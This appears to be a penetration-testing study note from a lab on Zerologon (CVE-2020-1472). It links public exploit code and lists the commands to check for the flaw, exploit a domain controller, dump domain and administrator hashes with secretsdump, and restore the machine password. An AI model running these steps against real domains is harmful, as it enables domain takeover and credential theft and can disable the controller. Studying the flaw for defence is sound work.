Zero Logon (CVE-2020-1472)
- need to restore the server after an attack
- https://www.trendmicro.com/en_us/what-is/zerologon.html
- https://github.com/dirkjanm/CVE-2020-1472
- https://github.com/SecuraBV/CVE-2020-1472
- python3 zerologon_check.py HYDRA-PC
- then call client, this has a very high chance of success, but also a high chance of killing the domain controller
- python3 cve-2020-1472-exploit.py HYDRA-DC
- secretsdump.py -just-dc MARVEL/HYDRA-DC$@
- secretsdump.py administrator@
-hashes - search for plain-password hex
- python3 restorepassword.py MARVEL/HYDRA-DC@HYDRA-DC -target-ip
-hexpass